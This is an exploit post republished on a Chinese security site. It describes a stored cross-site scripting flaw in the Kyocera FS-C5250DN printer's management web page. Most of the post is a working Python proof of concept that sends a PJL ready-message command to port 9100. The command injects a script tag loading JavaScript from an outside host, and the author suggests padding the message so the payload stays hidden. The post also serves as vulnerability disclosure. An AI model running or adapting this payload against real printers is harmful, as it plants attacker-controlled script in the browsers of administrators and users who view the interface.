首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kyocera FS5250 Cross Site Scripting
来源:vfocus.net 作者:Sergeant 发布时间:2014-04-04   
Found the below on a printer a couple of years ago, sent to Kyocera but
never heard anything back...

Changing the 'Ready' message on a printer is quite a well known prank (And
much fun was had with this yesterday!)  but also an interesting avenue for
injecting XSS,  as the Kyocera printer management interface plays the
status message back without any filtering.

It's quite a fun little hack!  Not having a Kyocera any more I can't test
it further, or whether it's now fixed, but it worked pretty consistently at
the time.  Might work in other makes/models of printers; please let me know
on here if you find any!

As the status message on printers is pretty well trusted;  injecting into
it causes side effects in all sorts of things,  I leave it up to the reader
to find other bits of software that capture these and replay them to users
unfiltered!

Python POC, sorry if the formatting gets mangled, first time posting code
to mailman:
##############################
# Date: 30/07/2012
# Semi*-persistent XSS in Kyocera web interface; tested on FS-C5250DN, may
work on other models.
#
# 1. The message currently on the printer's LCD is shown on the web
interface, unfiltered.
# 2. We can change this message using PJL commands
# 1+2 == xss
# for extra fun, the message can be longer than the display, so you can
hide your XSS :)
#
# *This resets on reboot, but how often do people reboot their printers?
#
##############################
import socket
HOST='10.0.0.1'
PORT=9100
#OPMSG      Pauses the printer until the users goes and mashes the buttons,
useful for social engineering in theory, could never get this to work
consistently in practice.
#RDYMSG     Persists until reboot
#base="@PJL OPMSG DISPLAY=\""

base="@PJL RDYMSG DISPLAY=\""
message="Ready                "
xss="<script src=http://ha.ckers.org/xss.js />"
payload= base + message + xss +  "\"\n\r"

print payload

s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,
socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error, msg:
        s = None
        continue
    try:
        s.connect(sa)
    except socket.error, msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print 'could not open socket'
    sys.exit(1)
s.sendall(payload)
s.close()
#Visit 10.0.0.1 now, and you'll get your xss back.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linksys E-Series TheMoon Remot
·PhonerLite 2.14 SIP Soft Phone
·JIRA Issues Collector Director
·ibstat $PATH Privilege Escalat
·AudioCoder 0.8.29 - Memory Cor
·MA Lighting Technology grandMA
·Fitnesse Wiki Remote Command E
·Google Voice Private/Unknown N
·SePortal 2.5 SQL Injection / R
·MacOSX 10.9.2/XNU HFS Hard Lin
·Fritz!Box Webcm Unauthenticate
·IBM Tealeaf CX 8.8 - Remote OS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved